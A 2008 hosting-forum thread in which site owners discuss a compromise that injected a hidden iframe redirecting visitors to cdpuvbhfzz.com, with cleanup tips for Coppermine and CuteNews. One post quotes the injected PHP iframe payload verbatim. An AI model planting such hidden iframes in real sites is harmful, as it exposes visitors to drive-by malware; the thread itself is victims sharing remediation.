Register or have you forgotten your password?
Get the most out of Surmunity, read our tips here! Need an interesting blog to read? You've got to read the Surpass Blog!
| Welcome! Please register to access all of our features.
| PHP, MySQL General PHP questions. Or go to our PHPsuexec Forum >> |
 |
|
|
LinkBack | Thread Tools | Search this Thread | Rate Thread |
April 10th, 2008, 3:52 PM
|
#1 (permalink) |
|
Registered User
Fresh Surpasser
Joined in Apr 2008
1 posts
Gave thanks: 0
Thanked 0 times
|
Anyone else had the 'cdpuvbhfzz' attack yet?
Hi everyone, theres a new hack at work which has already taken down quite a few sites (mine included) its inserting an iframe code into all php and html pages on servers and its trying to re-direct people to cdpuvbhfzz.com (DON'T GO TO THAT SITE). I was wondering if anyone else is having this problem or if a solution has been found? Theres more info about it here: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
My gallery, forum and cutenews have all been affected. I wasn't sure if this was the right place to post this but since it seems to be finding a way in through php files I thought it was the best place. I'm no wizz when it comes to php so if anyone has some suggestions I'd love to hear them cos I'm way out of ideas. |
|
    
|
|
April 10th, 2008, 4:02 PM
|
#2 (permalink) |
|
Registered User
Seasoned Poster
Joined in Dec 2004
Lives in Buffalo, NY
Hosted on Pass22
34 posts
Gave thanks: 0
Thanked 0 times
|
It just happened to me this morning. They added this iframe to the bottom of practically every file:
Code:
<?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?> |
|
|
|
|
April 10th, 2008, 7:27 PM
|
#3 (permalink) |
|
Registered User
Seasoned Poster
Joined in Dec 2004
Lives in Buffalo, NY
Hosted on Pass22
34 posts
Gave thanks: 0
Thanked 0 times
|
I think this might have something to do with Coppermine, read this thread:
Someone has Redirected my Site to cdpuvbhfzz.com-What do I do? |
|
|
|
|
April 12th, 2008, 3:23 AM
|
#4 (permalink) |
|
Registered User
Fresh Surpasser
Joined in May 2006
2 posts
Gave thanks: 0
Thanked 0 times
|
Oh, it's happened to mine. The folks at Surpass have been trying to help but have only managed to restore the forum. Having continued to do research or had helped from outside influence, I've discovered that even upgrading coppermine doesn't always fix the problem. I've taken it offline and fear that only fresh installs might be the answer, though I'm hoping for a miracle at this point. My website has been infected since the 7th when I first reported the problem to surpass.
And in case you're wondering, no, replacing the files does not work. There is a file that is continuing to add the iframe. Once that is gone, that should do it. But the trouble is finding that said file. And once you do, will just deleting the iframe code be enough? And will some files be able to take that? Surpass seems to indicate to me that just deleting it isn't the answer. Though, I've been back and forth with them since the 7th and have had better luck looking at what the folks at Coppermine are saying along with programmer friends. Not saying surpass can't fix this, just saying that as the situation stands, it's not getting much better. (They did manage to fix the forum though.) |
|
|
|
|
April 12th, 2008, 7:15 AM
|
#6 (permalink) |
|
Registered User
Fresh Surpasser
Joined in Jan 2007
4 posts
Gave thanks: 0
Thanked 0 times
|
Hmm, not sure why I can't edit my above post (there's no link), but anyway, the php problem had to do with the cutenews update. So while I deleted all of the bugs, I downgraded it back to 1.4.5 until I can figure out why 1.4.6 screwed up my php pages.
 Anyways, for those whose coppermine gallerys were affected, download the update, but first go into your /coppermine/albums/userpics/ folder. There should be a 142739_298w3 .jpg/zip/php file. Delete that! Also go into your gallery's config page, and delete that direct to the "custom header" (it will point to the userpics/10001/142739_298w3.jpg file). Your cutenews infected files are in the data folder. I went through all of the php files and deleted out the <iframe> code. Also, my comments.txt file was also spammed, so if you want to keep your current comments, you may have to manually go through that (the spam comments were all at the end of the file). Last edited by ange1; April 12th, 2008 at 7:28 AM.. |
|
|
|
|
April 12th, 2008, 3:24 PM
|
#7 (permalink) |
|
Registered User
Fresh Surpasser
Joined in May 2006
2 posts
Gave thanks: 0
Thanked 0 times
|
To add to what was just posted above, this is certainly what seems to be the problem for most. However I encountered some other problems! In each userpic album I found an index.html file that had the offending iframe attack. I deleted each and every one of them and it fixed the gallery! Unfortunately, not entirely. The album view is messed up. It only does on file per page. I'm not sure what that is. Does anyone have the answers?
EDIT: Duh is me. I just realized that they changed the settings in the thumbnail view. Once I did that, everything was back to normal! Last edited by Tao; April 12th, 2008 at 3:37 PM.. |
|
|
|
|
April 14th, 2008, 12:25 AM
|
#8 (permalink) |
|
Twist3d One
Super #1
Joined in Dec 2007
Hosted on pass81
1,489 posts
Gave thanks: 25
Thanked 35 times
|
Intresting. My gallery site hasn't been effected yet but this almost worries me to the point that i want to take it offline for now anyways.
__________________
 Pass81 |
|
|
|
|
April 18th, 2008, 10:49 PM
|
#9 (permalink) |
|
Registered User
Seasoned Poster
Joined in Feb 2005
76 posts
Gave thanks: 4
Thanked 2 times
|
I'm dealing with this today. Right now I've just finished sanitizing the Coppermine installs and now I'm going trough upgrading them to the newest version to fix it. ARGH!!!
__________________
SH65 kiextreme.com |
|
|
|
